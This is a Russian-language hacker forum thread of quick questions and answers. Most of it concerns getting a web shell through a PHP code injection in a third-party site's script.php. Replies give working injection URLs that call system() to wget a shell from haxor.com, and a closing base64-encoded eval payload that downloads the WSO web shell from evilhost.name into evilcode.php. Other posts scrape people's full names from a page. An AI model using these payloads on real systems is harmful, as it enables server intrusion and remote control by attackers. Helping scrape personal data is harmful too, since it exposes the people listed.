PHP: <?php $referer = 'referer'; $cookie='cookies.txt'; $data = 'login=login&p=pass'; set_time_limit(0); $session = curl_init(); curl_setopt($session, CURLOPT_USERAGENT, "Mozilla/5.0 (Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10)"); curl_setopt($session, CURLOPT_REFERER, $referer); curl_setopt($session, CURLOPT_HEADER, 1); curl_setopt($session, CURLOPT_COOKIEJAR, $cookie); curl_setopt($session, CURLOPT_POST, 1); curl_setopt($session, CURLOPT_URL, "domain.com"); curl_setopt($session, CURLOPT_POSTFIELDS, $data); curl_exec($session); curl_close($session); ?> Также почему то не меняется referer и user-agent.
Есть php code injection вида http://site.com/script.php?${system(id)} выдаёт мне команду id скачать шелл не выходит http://site.com/script.php?${system(wget http://haxor.com/shell.txt)} ls работает, а ls -la выдаёт: подскажите каким макаром шелл получить можно
Тебе сюда http://forum.antichat.ru/forum57.html Помогите составить регулярку для выдерки Фамилии имени и отчества с сайта получаю страницу из curl. Исходник страницы PHP: <tr> <td class="complKnowlege" style="vertical-align:middle;">1</td> <td class="complKnowlege" style="vertical-align:middle;">Иванова Ольга Викторовна</td> <td style="vertical-align:middle;">ФЛ</td> <td style="vertical-align:middle;">Да</td> <td style="vertical-align:middle;">301910113892</td> <td style="vertical-align:middle;"> </td> <td style="vertical-align:middle;">28.03.2000</td><td style="vertical-align:middle;"></td> <td class="complKnowlege" style="vertical-align:middle;"></td> <td class="complKnowlege" style="vertical-align:middle;"></td> моя регулярка PHP: $res = curl_exec($curl); preg_match_all("/(?=<td class=\"complKnowlege\" style=\"vertical-align\:middle;\">)([А-Яа-я]*)\s([А-Яа-я]*)\s([А-Яа-я]*)\s(?=<\/td>)/", $res, $q); print_r($q);
PHP: $res = curl_exec($curl); preg_match_all("|<td class=\"complKnowlege\" style=\"vertical-align\:middle\;\">(.*)<\/td>|", $res, $q); print_r($q);
Я уже писал в раздел уязвимости - удалили топик, писал в топик вопросы по уязвимостям - удалили пост. Здесь тоже не отвечают, куда писать вообще?
SergioBlog Попробуйте http://site.com/script.php?${$_GET[aaa]}&aaa=system('wget http://haxor.com/shell.txt') http://site.com/script.php?${stripslashes($_GET[aaa])}&aaa=system('wget http://haxor.com/shell.txt') N@b$ter для вопросов по регулярным выражениям есть специальный топик
Gifts script.php?${$_GET[aaa]}&aaa=system('wget http://haxor.com/shell.txt') второй вариант тоже самое(
Телепатов тут нету, в конституции не написано, что wget должен быть установлен на каждом серваке. По-поводу (ls -la), попробуй заменить пробел плюсом в url.
Пробовал плюс вместо пробела - cannot execute blank command тоже пишет. Да и проблема там не в том что wget нету, просто походу фильтруются символы какие-то.
Не могу смастерить правильно урл походу. там нужно без ; тк они автоматом как-то ставятся. Помогите смастерить с base64
PHP: eval(base64_decode(ZndyaXRlKGZvcGVuKCdldmlsY29kZS5waHAnLCAndycpLCBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2V2aWxob3N0Lm5hbWUvd3NvMicpKTsg))
